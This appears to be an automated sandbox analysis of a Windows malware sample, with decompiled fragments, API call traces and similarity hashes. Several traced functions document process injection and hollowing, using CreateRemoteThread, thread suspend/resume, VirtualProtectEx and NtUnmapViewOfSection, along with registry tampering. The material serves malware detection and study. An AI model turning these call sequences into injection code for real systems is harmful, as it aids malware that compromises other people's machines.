				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
